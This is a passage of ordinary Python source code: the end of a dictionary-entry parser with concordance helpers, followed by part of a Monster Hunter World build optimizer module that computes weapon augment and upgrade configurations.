#print("Importante: Palabra: %s, Capital de la siguiente %s, Latin de la siguiente %s" %(text_list[i], terms_view[i+1], latin_view[i+1]))
if (not terms_view[i+1]):
if (not latin_view[i+1]) or (text_list[i+1] == "de"):
latin_key= latin_key + text_list[i]
#print("Actualizando latin key %s" %(latin_key))
else:
half_key = half_key + text_list[i]
#print("Entro-0 a guardar half_key %s" % half_key)
else:
half_key = half_key + text_list[i]
#print("Entro-1 a guardar half_key %s" % half_key)
#See ZEUS. - managing ZEUS.
elif ("." in text_list[i]) and ('See' == text_list[i-1]):
articles_page[key]= articles_page[key] + ' ' + text_list[i]
# ABACISCUS. See ABACUS. - Managing ABACISCUS.
elif ("." in text_list[i]):
if (i< num_words -1):
#checking that the next one is See
if ("See" == text_list[i+1]):
word= text_list[i].split(".")[0]
key = word
# Managing key repitions
if key in articles_page.keys():
repeated_key[key] += 1
key=key+"-"+str(repeated_key[key])
else:
repeated_key[key] = 0
# Updating the articles dictionary with the new key
articles_page[key] = ''
#ignoring the header of the first page - second half
if(half_key == "DCOMPLETEONARYFCIENCE"):
half_key=''
# AB ACO, - recording AB (of AB ACO,)
else:
half_key=half_key+text_list[i]
#print("Entro-2 a guardar half_key %s" % half_key)
#UPPERCASE WITH COMMA
else:
# AATTER, or AT TER - managing TER,
if ('or' == text_list[i-1]) or ('or' == text_list[i-2] and terms_view[i-1]):
if half_key!='':
articles_page[key]= articles_page[key] + ' ' + half_key + ' ' + text_list[i]
half_key = ''
else:
articles_page[key]= articles_page[key] + ' ' + text_list[i]
#print("!Entro en - or UPPERCASE,- : key %s - text %s:" %(key, articles_page[key]))
#See ASTRONOMY, - managing ASTRONOMY,
elif ('See' == text_list[i-1]):
articles_page[key]= articles_page[key] + ' ' + text_list[i]
else:
# AB ACO, - recording ACO, (of AB ACO,)
# key= ABACO,
if half_key!='':
key=half_key + word
half_key=''
flag = 1
else:
# double A, but - Avoiding to create a new key when UPPERCASE, after a but
if (i < num_words -1):
if text_list[i+1] == "but":
articles_page[key]= articles_page[key] + ' ' + text_list[i]
# RECORDING THE KEY, in the normal case
else:
key=word
flag = 1
# RECORDING THE KEY, in the normal case
else:
key = word
flag = 1
#DEALING WITH THE FIRST PAGE
if key == "SABAA":
key=word[-2:]
flag = 1
if flag == 1 :
#print(" Entro cuando encuentra nueva key: %s" % key)
# Managing key repitions
if key in articles_page.keys():
repeated_key[key] += 1
key=key+"-"+str(repeated_key[key])
else:
repeated_key[key] = 0
#Updating the articles dictionary with the new key
articles_page[key] = ''
#term in lowercase
else:
#UpperCase in the middle of the text
##ACQUIETANDIS plegiis, - managin plegiis,
if latin_key!='':
if ',' in text_list[i]:
key=latin_key+ " " +word
articles_page[key]= ''
latin_key=''
# ACQUIETANTIA de Jhiris et hundredh, - manaing several latin terms before the last one with comma.
else:
latin_key= latin_key + " " + text_list[i]
elif half_key!='':
if (half_key != "ANEWADICTI"):
articles_page[key]= articles_page[key] + ' ' + half_key + ' ' + text_list[i]
#print("Entro para darle el half_key %s al articles_page[%s]:%s" %(half_key, key, articles_page[key]))
half_key=''
elif articles_page[key] != '' :
articles_page[key]= articles_page[key] + ' ' + text_list[i]
else:
articles_page[key]= text_list[i]
# deleting empty keys:
empty_keys = [k for k,v in articles_page.items() if not v]
for k in empty_keys:
del articles_page[k]
return articles_page
def get_text_keyword_idx(text,
keywords):
"""
Gets a list of keywords (and their position indices) within an
article.
:param text: text
:type article: string
:param keywords: keywords
:type keywords: list(str or unicode)
:return: sorted list of keywords and their indices
:rtype: list(tuple(str or unicode, int))
"""
text_list= text.split()
matches = set()
for idx, word in enumerate(text_list):
if word in keywords:
match = (word, idx)
matches.add(match)
return sorted(list(matches))
def get_concordance(text,
keyword,
idx,
window):
"""
For a given keyword (and its position in an article), return
the concordance of words (before and after) using a window.
:param text: text
:type text: string
:param keyword: keyword
:type keyword: str or unicode
:param idx: keyword index (position) in list of article's words
:type idx: int
:window: number of words to the right and left
:type: int
:return: concordance
:rtype: list(str or unicode)
"""
text_list= text.split()
text_size = len(text_list)
if idx >= window:
start_idx = idx - window
else:
start_idx = 0
if idx + window >= text_size:
end_idx = text_size
else:
end_idx = idx + window + 1
concordance_words = []
for word in text_list[start_idx:end_idx]:
concordance_words.append(word)
return concordance_words
|
# -*- coding: ascii -*-
"""
Filename: query_weapons.py
Author: <EMAIL>
This file provides the MHWI build optimizer script's weapon database queries.
"""
import json
import logging
from abc import ABC, abstractmethod
from collections import namedtuple
from itertools import accumulate, product, zip_longest
from enum import Enum, auto
from copy import copy
from .utils import prune_by_superceding
from .loggingutils import ExecutionProgress, dump_pruned_weapon_combos
from .database_skills import SetBonus
from .database_weapons import (SHARPNESS_LEVEL_NAMES,
MaximumSharpness,
WeaponAugmentationScheme,
WeaponUpgradeScheme,
weapon_db)
logger = logging.getLogger(__name__)
WeaponAugmentsContribution = namedtuple(
"WeaponAugmentsContribution",
[
"added_attack_power",
"added_raw_affinity",
"extra_decoration_slot_level",
],
)
class WeaponAugmentTracker(ABC):
@classmethod
def get_instance(cls, weapon):
#assert isinstance(weapon, namedtuple) # TODO: Make a proper assertion.
if weapon.augmentation_scheme is WeaponAugmentationScheme.ICEBORNE:
return IBWeaponAugmentTracker(weapon.rarity)
elif weapon.augmentation_scheme is WeaponAugmentationScheme.NONE:
return NoWeaponAugments()
else:
raise RuntimeError(f"Augmentation scheme {weapon.augmentation_scheme} not supported.")
@classmethod
def get_maximized_trackers(cls, weapon, *, health_regen_minimum):
trackers = []
bare_tracker = cls.get_instance(weapon)
for config_obj in bare_tracker.get_maximized_configs(health_regen_minimum=health_regen_minimum):
tracker = cls.get_instance(weapon)
tracker.update_with_config(config_obj)
trackers.append(tracker)
return trackers
# TODO: Use something better, like the __copy__() method.
@abstractmethod
def copy(self):
raise NotImplementedError
# Outputs some arbitrary structure.
#
# This function is only really intended for diagnostic purposes for now, but will be given more important roles
# later. I'll properly define the structure then.
@abstractmethod
def get_config(self):
raise NotImplementedError
# Similar to get_config(), but this returns an arbitrary string that the class can read to restore to the same augments.
@abstractmethod
def get_serialized_config(self):
raise NotImplementedError
# Gives back a WeaponAugmentsContribution namedtuple with all the values the current
# set of augments contributes to the build.
@abstractmethod
def calculate_contribution(self):
raise NotImplementedError
# Gives back a list of arbitrary things describing all the possible maximum configurations.
# You can pass one of these things to update_with_config.
#
# health_regen_minimum is the minimum level we need it to be.
@abstractmethod
def get_maximized_configs(self, health_regen_minimum=0):
raise NotImplementedError
# Set the config to the selected config.
@abstractmethod
def update_with_config(self, selected_config):
raise NotImplementedError
# Similar to update_with_config(), but you get a string returned by get_serialized_config().
@abstractmethod
def update_with_serialized_config(self, serialized_config):
raise NotImplementedError
# Returns a one-line string that represents the state of the tracker.
# Mostly targeted for debugging purposes.
@abstractmethod
def to_str_debugging(self):
raise NotImplementedError
class NoWeaponAugments(WeaponAugmentTracker):
MAGIC_WORD = "NoWeaponAugments"
def copy(self):
return self # It shouldn't matter at all
def get_config(self):
return []
def get_serialized_config(self):
return self.MAGIC_WORD
def calculate_contribution(self):
ret = WeaponAugmentsContribution (
added_attack_power = 0,
added_raw_affinity = 0,
extra_decoration_slot_level = 0,
)
return ret
def get_maximized_configs(self, health_regen_minimum=0):
if health_regen_minimum > 0:
return []
else:
return None # Not possible to add health regen.
def update_with_config(self, selected_config):
raise RuntimeError("Can't update the augments of a weapon that can't be augmented.")
def update_with_serialized_config(self, serialized_config):
assert serialized_config == self.MAGIC_WORD
return
def to_str_debugging(self):
return "Cannot augment this weapon."
class IBWeaponAugmentType(Enum):
AUGMENT_LEVEL = auto() # This one's not really an augment.
ATTACK_INCREASE = auto()
AFFINITY_INCREASE = auto()
#DEFENSE_INCREASE = auto() # I'm just gonna pretend these don't exist yet...
SLOT_UPGRADE = auto()
HEALTH_REGEN = auto()
#ELEMENT_STATUS_EFFECT_UP = auto()
class IBWeaponAugmentTracker(WeaponAugmentTracker):
__slots__ = [
"auto_maximize",
"_rarity",
"_aug_level",
"_augments",
]
IB_AUGMENTATION_SLOTS = {
10: [5, 7, 9, 10],
11: [4, 5, 6, 8 ],
12: [3, 4, 5, 6 ],
# 0 1 2 3 = slot level
}
IB_SLOT_CONSUMPTIONS = {
IBWeaponAugmentType.ATTACK_INCREASE : [3, 2, 2, 2],
IBWeaponAugmentType.AFFINITY_INCREASE : [2, 2, 2, 2],
#IBWeaponAugmentType.DEFENSE_INCREASE : [1, 1, 1, 2],
IBWeaponAugmentType.SLOT_UPGRADE : [3, 3, 1, 1],
IBWeaponAugmentType.HEALTH_REGEN : [3, 2, 2, 2],
#IBWeaponAugmentType.ELEMENT_STATUS_EFFECT_UP : [1, 2, 2, 2],
}
_IB_MAX_SLOT_LEVEL = 3 # This determines the maximum slot level, i.e. length of each IB_AUGMENTATION_SLOTS list.
_IB_AUGMENT_MAX_LEVEL = 4 # This determines the maximum level of each of the IBWeaponAugmentTypes.
IB_ATTACK_AUGMENT_VALUES = (0, 5, 5, 5, 5)
IB_AFFINITY_AUGMENT_VALUES_PERCENTAGES = (0, 10, 5, 5, 5)
# level = 0 1 2 3 4
IB_SLOT_CONSUMPTIONS_CUMULATIVE = {k: list(accumulate(v)) for (k, v) in IB_SLOT_CONSUMPTIONS.items()}
IB_ATTACK_AUGMENT_CUMULATIVE = tuple(accumulate(IB_ATTACK_AUGMENT_VALUES))
IB_AFFINITY_AUGMENT_PERCENTAGES_CUMULATIVE = tuple(accumulate(IB_AFFINITY_AUGMENT_VALUES_PERCENTAGES))
def __init__(self, rarity, auto_maximize=True):
assert isinstance(rarity, int)
assert isinstance(auto_maximize, bool)
if auto_maximize == False:
raise NotImplementedError("Only works with auto-maximize on for now.")
# To implement auto_maximize==False, we'd need to actually allow lower augment levels.
self._auto_maximize = auto_maximize
self._rarity = rarity
self._aug_level = self._IB_MAX_SLOT_LEVEL
self._augments = {} # {IBWeaponAugmentType: int}
assert self._state_is_valid()
return
def copy(self):
new = copy(self)
new._augments = copy(self._augments)
assert new._state_is_valid()
return new
def get_config(self):
return list(self._augments.items())
def get_serialized_config(self):
augments = {k.name: v for (k, v) in self._augments.items()}
data = {
"rarity": self._rarity,
"aug_level": self._aug_level,
"augments": augments,
}
serialized_data = json.dumps(data)
assert isinstance(serialized_data, str)
return serialized_data
def calculate_contribution(self):
attack_level = self._augments.get(IBWeaponAugmentType.ATTACK_INCREASE, 0)
affinity_level = self._augments.get(IBWeaponAugmentType.AFFINITY_INCREASE, 0)
decoration_slot_level = self._augments.get(IBWeaponAugmentType.SLOT_UPGRADE, 0)
ret = WeaponAugmentsContribution (
added_attack_power = \
self.IB_ATTACK_AUGMENT_CUMULATIVE[attack_level],
added_raw_affinity = \
self.IB_AFFINITY_AUGMENT_PERCENTAGES_CUMULATIVE[affinity_level],
extra_decoration_slot_level = \
decoration_slot_level,
)
return ret
def get_maximized_configs(self, health_regen_minimum=0):
maximized_configs = []
efr_augments = {
IBWeaponAugmentType.ATTACK_INCREASE,
IBWeaponAugmentType.AFFINITY_INCREASE,
IBWeaponAugmentType.SLOT_UPGRADE,
}
picks = [[(aug, x) for x in range(self._IB_AUGMENT_MAX_LEVEL + 1)] for aug in efr_augments]
# range() will go from 0 to 4. 0 will mean no augment, and 1-4 will be each level.
for augs in product(*picks):
config = [(aug, level) for (aug, level) in augs if (level > 0)]
assert IBWeaponAugmentType.HEALTH_REGEN not in set(x for (x, _) in config) # Assume it's not in yet.
if health_regen_minimum > 0:
config.append((IBWeaponAugmentType.HEALTH_REGEN, health_regen_minimum))
if self._is_valid_configuration(config, self._rarity, self._aug_level):
maximized_configs.append(config)
return maximized_configs
def update_with_config(self, selected_config):
assert isinstance(selected_config, list) # May accept dicts later.
#assert (selected_config in self.get_maximized_configs()) or (len(selected_config) == 0) # Fails if our config isn't maximized
assert all((level >= 0) and (level <= 4) for (augment, level) in selected_config)
self._augments = {augment: level for (augment, level) in selected_config}
assert len(self._augments) == len(selected_config) # Quick check if we have any duplicates.
assert self._state_is_valid() # If our config breaks anything, it should be caught here
return
def update_with_serialized_config(self, serialized_config):
assert isinstance(serialized_config, str)
data = json.loads(serialized_config)
# We check that we're updating the right tracker.
assert self._rarity == data["rarity"]
assert self._aug_level == data["aug_level"]
self._augments = {IBWeaponAugmentType[k]: v for (k, v) in data["augments"].items()}
assert self._state_is_valid()
return
def to_str_debugging(self):
return f"[Augmentation Level: {self._aug_level}] " + ",".join(f"{k.name}_{v}" for (k, v) in self._augments.items())
def _state_is_valid(self):
config_list = list(self._augments.items())
ret = all(isinstance(k, IBWeaponAugmentType) and isinstance(v, int) for (k, v) in self._augments.items()) \
and all((v >= 0) and (v <= 4) for (k, v) in self._augments.items()) \
and (IBWeaponAugmentType.AUGMENT_LEVEL not in self._augments.items()) \
and self._is_valid_configuration(config_list, self._rarity, self._aug_level)
return ret
@classmethod
def _is_valid_configuration(cls, config_list, rarity, aug_level):
assert isinstance(config_list, list)
assert all(isinstance(aug, IBWeaponAugmentType) and isinstance(level, int) for (aug, level) in config_list)
assert all((level >= 0) and (level <= cls._IB_AUGMENT_MAX_LEVEL) for (_, level) in config_list)
assert len(config_list) == len(set(x for (x, _) in config_list))
slots_maximum = cls.IB_AUGMENTATION_SLOTS[rarity][aug_level]
slots_used = 0
for (aug, level) in config_list:
if level > 0:
slots_used += cls.IB_SLOT_CONSUMPTIONS_CUMULATIVE[aug][level - 1]
# IMPORTANT: Need to remember that the slot consumptions list starts at level 1.
if slots_used <= slots_maximum:
return True
else:
return False
WeaponUpgradesContribution = namedtuple(
"WeaponUpgradesContribution",
[
"added_attack_power",
"added_raw_affinity",
"extra_decoration_slot_level",
"new_max_sharpness_values",
"set_bonus",
],
)
class WeaponUpgradeTracker(ABC):
@classmethod
def get_instance(cls, weapon):
#assert isinstance(weapon, namedtuple) # TODO: Make a proper assertion.
if weapon.upgrade_scheme is WeaponUpgradeScheme.ICEBORNE_COMMON:
return IBCWeaponUpgradeTracker()
elif weapon.upgrade_scheme is WeaponUpgradeScheme.SAFI_STANDARD:
return SafiWeaponUpgrades()
elif weapon.upgrade_scheme is WeaponUpgradeScheme.NONE:
return NoWeaponUpgrades()
else:
raise RuntimeError(f"Upgrade scheme {weapon.upgrade_scheme} not supported.")
# TODO: Consider pruning configurations that are clearly inferior, rather than just pruning
# configurations that have unique contributions.
@classmethod
def get_maximized_trackers_pruned(cls, weapon):
trackers = []
seen_tracker_contributions = set()
bare_tracker = cls.get_instance(weapon)
for config_obj in bare_tracker.get_maximized_configs():
tracker = cls.get_instance(weapon)
tracker.update_with_config(config_obj)
contribution = tracker.calculate_contribution()
if contribution not in seen_tracker_contributions:
seen_tracker_contributions.add(contribution)
trackers.append(tracker)
return trackers
# TODO: Use something better, like the __copy__() method.
@abstractmethod
def copy(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def get_config(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def get_serialized_config(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def calculate_contribution(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def get_maximized_configs(self):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def update_with_config(self, selected_config):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def update_with_serialized_config(self, serialized_config):
raise NotImplementedError
# Similar to WeaponAugmentTracker
@abstractmethod
def to_str_debugging(self):
raise NotImplementedError
class NoWeaponUpgrades(WeaponUpgradeTracker):
MAGIC_WORD = "NoWeaponUpgrades"
def copy(self):
return self # It shouldn't matter at all
def get_config(self):
return []
def get_serialized_config(self):
return self.MAGIC_WORD
def calculate_contribution(self):
ret = WeaponUpgradesContribution (
added_attack_power = 0,
added_raw_affinity = 0,
extra_decoration_slot_level = 0,
new_max_sharpness_values = None,
set_bonus = None,
)
return ret
def get_maximized_configs(self):
return [None]
def update_with_config(self, selected_config):
if selected_config is not None:
raise RuntimeError("Can't update the upgrades of a weapon that can't be upgraded.")
return
def update_with_serialized_config(self, serialized_config):
assert serialized_config == self.MAGIC_WORD
def to_str_debugging(self):
return "Cannot upgrade this weapon."
class IBCWeaponUpgradeType(Enum):
ATTACK = auto()
AFFINITY = auto()
#ELEMENTAL_STATUS = auto() # I'm just gonna pretend these don't exist yet...
#DEFENSE = auto()
class IBCWeaponUpgradeTracker(WeaponUpgradeTracker):
__slots__ = [
"_upgrades",
]
_IB_ATTACK_UPGRADE_VALUES = (1, 1, 1, 1, 1, 1 , 2)
_IB_AFFINITY_UPGRADE_VALUES = (1, 1, 1, 1, 1, None, 3)
# level = 1 2 3 4 5 6 7
_m1 = [
[IBCWeaponUpgradeType.ATTACK] * 6,
([IBCWeaponUpgradeType.AFFINITY] * 1) + ([IBCWeaponUpgradeType.ATTACK] * 5),
([IBCWeaponUpgradeType.AFFINITY] * 2) + ([IBCWeaponUpgradeType.ATTACK] * 4),
([IBCWeaponUpgradeType.AFFINITY] * 3) + ([IBCWeaponUpgradeType.ATTACK] * 3),
([IBCWeaponUpgradeType.AFFINITY] * 4) + ([IBCWeaponUpgradeType.ATTACK] * 2),
([IBCWeaponUpgradeType.AFFINITY] * 5) + ([IBCWeaponUpgradeType.ATTACK] * 1),
]
_m2 = [
[IBCWeaponUpgradeType.ATTACK],
[IBCWeaponUpgradeType.AFFINITY],
]
# TODO: Consider automating this definition better.
_MAXIMIZED_CONFIGS = [(x + y) for (x, y) in product(_m1, _m2)]
def __init__(self):
self._upgrades = []
assert self._state_is_valid()
return
def copy(self):
new = copy(self)
new._upgrades = copy(self._upgrades)
assert new._state_is_valid()
return new
def get_config(self):
return copy(self._upgrades)
def get_serialized_config(self):
upgrades_strs = [(x.name if (x is not None) else None) for x in self._upgrades]
serialized_data = json.dumps(upgrades_strs)
assert isinstance(serialized_data, str)
return serialized_data
def calculate_contribution(self):
# IMPORTANT: We're actually mostly just relying on this function for debugging.
# If this function doesn't raise an exception, then we're good.
added_attack_power = 0
added_raw_affinity = 0
for (i, upgrade) in enumerate(self._upgrades):
assert i < len(self._IB_ATTACK_UPGRADE_VALUES)
if upgrade is IBCWeaponUpgradeType.ATTACK:
added_attack_power += self._IB_ATTACK_UPGRADE_VALUES[i]
elif upgrade is IBCWeaponUpgradeType.AFFINITY:
added_raw_affinity += self._IB_AFFINITY_UPGRADE_VALUES[i]
else:
raise RuntimeError("Unsupported upgrade type found: " + str(type(upgrade)))
ret = WeaponUpgradesContribution (
added_attack_power = added_attack_power,
added_raw_affinity = added_raw_affinity,
extra_decoration_slot_level = 0,
new_max_sharpness_values = None,
set_bonus = None,
)
return ret
def get_maximized_configs(self):
return self._MAXIMIZED_CONFIGS
def update_with_config(self, selected_config):
if selected_config is None:
self._upgrades = []
else:
assert isinstance(selected_config, list)
self._upgrades = selected_config
assert self._state_is_valid()
return
def update_with_serialized_config(self, serialized_config):
assert isinstance(serialized_config, str)
upgrades_strs = json.loads(serialized_config)
assert isinstance(upgrades_strs, list)
self._upgrades = [(IBCWeaponUpgradeType[x] if (x is not None) else None) for x in upgrades_strs]
assert self._state_is_valid()
return
def to_str_debugging(self):
return ",".join(x.name for x in self._upgrades)
def _state_is_valid(self):
# We generally just rely on calculate_contribution() to raise exceptions when something's wrong.
return (len(self._upgrades) <= 7)
class SafiWeaponStandardUpgradeType(Enum):
ATTACK = auto()
AFFINITY = auto()
#STATUS = auto() # Will implement later.
#ELEMENT = auto() # Will implement later.
#DEFENSE = auto() # Will implement later.
SLOT = auto()
SHARPNESS = auto()
SafiWeaponSetBonusUpgradeTypeInfo = namedtuple("SafiWeaponSetBonusUpgradeTypeInfo", ["upgrade_name", "set_bonus_name"])
class SafiWeaponSetBonusUpgradeType(Enum):
TEOSTRA_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo("Teostra Essence", "TEOSTRA_TECHNIQUE")
TIGREX_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo("Tigrex Essence", "TIGREX_ESSENCE")
VELKHANA_ESSENCE = SafiWeaponSetBonusUpgradeTypeInfo("Velkhana Essence", "VELKHANA_DIVINITY")
# I'll add the others as I fill the database!
class SafiWeaponUpgrades(WeaponUpgradeTracker):
__slots__ = [
"_config",
]
# TODO: These values are true for GS according to honeyhunterworld.com. What about other weapons?
# level = 1 2 3 4 5 6
_ATTACK_VALUES = (None, None, None, 7, 9, 14) # Raw added to the weapon raw. Other levels not yet implemented.
_AFFINITY_VALUES = (None, None, None, 8, 10, 15) # Added affinity percentage. Other levels not yet implemented.
_SLOT_VALUES = (None, None, 1, 2, 3, 4 ) # The level of the slot. Slot I and II don't exist.
_SHARPNESS_VALUES = (None, None, None, 40, 50, 70) # Sharpness value added. Other levels not yet implemented.
_WHITE_MAX = 120 # Maximum white sharpness value before we overflow into purple sharpness.
_BASE_SHARPNESS = MaximumSharpness(100, 50, 50, 50, 50, 90, 0) # All Safi weapons start at this sharpness.
_MAXIMIZED_CONFIG_REGULAR_PICKS = [ # TODO: Consider automating this definition.
(SafiWeaponStandardUpgradeType.ATTACK, 5),
(SafiWeaponStandardUpgradeType.AFFINITY, 5),
(SafiWeaponStandardUpgradeType.SHARPNESS, 5),
(SafiWeaponStandardUpgradeType.SLOT, 5),
]
_MAXIMIZED_CONFIG_LEVEL_6_PICKS = [ # TODO: Consider automating this definition.
(SafiWeaponStandardUpgradeType.ATTACK, 6),
(SafiWeaponStandardUpgradeType.AFFINITY, 6),
(SafiWeaponStandardUpgradeType.SHARPNESS, 6),
(SafiWeaponStandardUpgradeType.SLOT, 6),
]
_MAXIMIZED_CONFIG_SET_BONUS_PICKS = [(x, 1) for x in SafiWeaponSetBonusUpgradeType]
def __init__(self):
self._config = []
assert self._state_is_valid()
return
def copy(self):
new = copy(self)
new._config = copy(self._config)
assert new._state_is_valid()
return new
def get_config(self):
return copy(self._config)
def get_serialized_config(self):
assert self._state_is_valid()
json_serializable = [(upgrade_type.name, level) for (upgrade_type, level) in self._config]
return json.dumps(json_serializable)
def calculate_contribution(self):
assert self._state_is_valid() # We rely on these assumptions. E.g. only one set bonus upgrade.
added_attack_power = 0
added_raw_affinity = 0
extra_decoration_slot_level = 0
added_sharpness_value = 0 # We turn this into new_max_sharpness_values once we have it.
set_bonus = None
for (upgrade_type, level) in self._config:
if upgrade_type is SafiWeaponStandardUpgradeType.ATTACK:
added_attack_power += self._ATTACK_VALUES[level - 1]
elif upgrade_type is SafiWeaponStandardUpgradeType.AFFINITY:
added_raw_affinity += self._AFFINITY_VALUES[level - 1]
elif upgrade_type is SafiWeaponStandardUpgradeType.SLOT:
extra_decoration_slot_level += self._SLOT_VALUES[level - 1]
elif upgrade_type is SafiWeaponStandardUpgradeType.SHARPNESS:
added_sharpness_value += self._SHARPNESS_VALUES[level - 1]
elif isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType):
assert set_bonus is None
set_bonus = SetBonus[upgrade_type.value.set_bonus_name]
else:
raise RuntimeError("Not a valid Safi upgrade type.")
# Now, we calculate sharpness
assert SHARPNESS_LEVEL_NAMES[5] == "White"
assert SHARPNESS_LEVEL_NAMES[6] == "Purple"
assert len(SHARPNESS_LEVEL_NAMES) == 7
white_value = self._BASE_SHARPNESS[5] + added_sharpness_value
purple_value = 0
if white_value > self._WHITE_MAX:
purple_value = white_value - self._WHITE_MAX
white_value = self._WHITE_MAX
new_max_sharpness_values = MaximumSharpness(
self._BASE_SHARPNESS[0],
self._BASE_SHARPNESS[1],
self._BASE_SHARPNESS[2],
self._BASE_SHARPNESS[3],
self._BASE_SHARPNESS[4],
white_value,
purple_value,
)
# We've calculated everything, so now we return.
ret = WeaponUpgradesContribution (
added_attack_power = added_attack_power,
added_raw_affinity = added_raw_affinity,
extra_decoration_slot_level = extra_decoration_slot_level,
new_max_sharpness_values = new_max_sharpness_values,
set_bonus = set_bonus,
)
return ret
def get_maximized_configs(self):
maximized_configs = []
it = product(
self._MAXIMIZED_CONFIG_LEVEL_6_PICKS,
self._MAXIMIZED_CONFIG_REGULAR_PICKS,
self._MAXIMIZED_CONFIG_REGULAR_PICKS,
self._MAXIMIZED_CONFIG_REGULAR_PICKS, # TODO: Make it so slot upgrades only work
self._MAXIMIZED_CONFIG_REGULAR_PICKS + self._MAXIMIZED_CONFIG_SET_BONUS_PICKS,
)
for tup in it:
config = list(tup)
if self._is_valid_configuration(config):
maximized_configs.append(config)
return maximized_configs
def update_with_config(self, selected_config):
self._config = copy(selected_config)
assert self._state_is_valid()
return
def update_with_serialized_config(self, serialized_config):
json_parsed_config = json.loads(serialized_config)
self._config = []
for (upgrade_type_str, level) in json_parsed_config:
if upgrade_type_str in SafiWeaponStandardUpgradeType.__members__:
upgrade_type = SafiWeaponStandardUpgradeType[upgrade_type_str]
elif upgrade_type_str in SafiWeaponSetBonusUpgradeType.__members__:
upgrade_type = SafiWeaponSetBonusUpgradeType[upgrade_type_str]
else:
raise RuntimeError("Unknown Safi upgrade type.")
self._config.append((upgrade_type, level))
assert self._state_is_valid() # We test for config validity here.
return
def to_str_debugging(self):
return ",".join(f"{k.name}_{v}" for (k, v) in self._config)
def _state_is_valid(self):
if len(self._config) > 5 or (not self._is_valid_configuration(self._config)):
return False
for (upgrade_type, level) in self._config:
if not (isinstance(upgrade_type, SafiWeaponStandardUpgradeType)
or isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType)):
return False
return True
@classmethod
def _is_valid_configuration(cls, config_list):
assert len(config_list) <= 5
has_slot = False
has_set_bonus = False
has_level_6 = False
for (upgrade_type, level) in config_list:
if upgrade_type is SafiWeaponStandardUpgradeType.SLOT:
if has_slot:
return False
has_slot = True
elif isinstance(upgrade_type, SafiWeaponSetBonusUpgradeType):
if has_set_bonus:
return False
has_set_bonus = True
elif (level > 6) or (level < 1):
return False
elif level == 6:
if has_level_6:
return False
has_level_6 = True
return True
WeaponFinalValues = namedtuple(
"WeaponFinalValues",
[
"original_weapon", # The original weapon object
"true_raw",
"affinity",
"slots",
"set_bonus",
"skill",
"is_raw",
"maximum_sharpness",
"constant_sharpness",
],
)
# Calculates a weapon's final values based on all selected augments and upgrades.
def calculate_final_weapon_values(weapon, weapon_augments_tracker, weapon_upgrades_tracker):
assert isinstance(weapon, tuple) # TODO: Make a more specific type assertion.
assert isinstance(weapon_augments_tracker, WeaponAugmentTracker)
assert isinstance(weapon_upgrades_tracker, WeaponUpgradeTracker)
a_contrib = weapon_augments_tracker.calculate_contribution()
u_contrib = weapon_upgrades_tracker.calculate_contribution()
bloat_value = weapon.type.value.bloat
weapon_true_raw = weapon.attack / bloat_value
slots = weapon.slots \
+ ((a_contrib.extra_decoration_slot_level,) if (a_contrib.extra_decoration_slot_level > 0) else tuple()) \
+ ((u_contrib.extra_decoration_slot_level,) if (u_contrib.extra_decoration_slot_level > 0) else tuple())
assert all((x in {1,2,3,4}) for x in slots)
if u_contrib.new_max_sharpness_values is not None:
maximum_sharpness = u_contrib.new_max_sharpness_values
else:
maximum_sharpness = weapon.maximum_sharpness
tup = WeaponFinalValues(
original_weapon = weapon,
true_raw = weapon_true_raw + a_contrib.added_attack_power + u_contrib.added_attack_power,
affinity = weapon.affinity + a_contrib.added_raw_affinity + u_contrib.added_raw_affinity,
slots = slots,
set_bonus = u_contrib.set_bonus,
skill = weapon.skill,
is_raw = weapon.is_raw,
maximum_sharpness = maximum_sharpness,
constant_sharpness = weapon.constant_sharpness
)
return tup
# Decides if w1 supercedes w2.
def _weapon_combo_supercedes(w1, w2):
assert isinstance(w1, WeaponFinalValues)
assert isinstance(w2, WeaponFinalValues)
# STAGE 1: We first decide if w1 has any values less than w2.
if w1.true_raw < w2.true_raw:
return False
if w1.affinity < w2.affinity:
return False
# The logic of this slots thing is a little complex. Here's are some examples of how it works!
# Let's assume left is w1 and right is w2.
# [3,3] [1] --> continue since w1 is clearly better.
# [1] [3,3] --> return False since (1 < 3) for the first element evaluates True.
# [4,1,1] [3,3] --> return False since (1 < 3) for the second element evaluates True.
# To explain that last example, we can't guarantee that the [3,3] jewels can be fit into [4,1,1],
# hence we cannot prune away w2.
w1_slots = sorted(list(w1.slots), reverse=True)
w2_slots = sorted(list(w2.slots), reverse=True)
assert (len(w1_slots) == 0) or (w1_slots[0] >= w1_slots[-1]) # Sanity check that it's in descending order.
assert (len(w2_slots) == 0) or (w2_slots[0] >= w2_slots[-1]) # Sanity check that it's in descending order.
if any((w1_slot < w2_slot) for (w1_slot, w2_slot) in zip_longest(w1_slots, w2_slots, fillvalue=0)):
return False
# We can explain this through truth tables:
# | w2=None | w2=setbonusA | w2=setbonusB
# -------------|----------|--------------|--------------
# w1=None | continue | return False | return False
# w1=setbonusA | continue | continue | return False
# w1=setbonusB | continue | return False | continue
# -------------|----------|--------------|--------------
# So, we only continue if w2 is None, or the set bonuses are the same.
if (w2.set_bonus is not None) and (w1.set_bonus is not w2.set_bonus):
return False
# For now, we just group everything by whether they are raw or not.
# Any pair where one is raw and one isn't cannot supercede each other.
if w1.is_raw != w2.is_raw:
return False
# We just return if any sharpness level in w1 has fewer hits than in w2.
assert len(w1.maximum_sharpness) == len(w2.maximum_sharpness)
if any((s1 < s2) for (s1, s2) in zip(w1.maximum_sharpness, w2.maximum_sharpness)):
return False
# STAGE 2: We now decide if w1 has anything better than w2.
if w1.true_raw > w2.true_raw:
return True
if w1.affinity > w2.affinity:
return True
# The same as in stage 1, but the other way around!
if any((w1_slot > w2_slot) for (w1_slot, w2_slot) in zip_longest(w1_slots, w2_slots, fillvalue=0)):
return True
# For set bonuses, let's have a look at the remaining options:
# | w2=None | w2=setbonusA | w2=setbonusB
# -------------|-------------|--------------|--------------
# w1=None | continue | |
# w1=setbonusA | return True | continue |
# w1=setbonusB | return True | | continue
# -------------|-------------|--------------|--------------
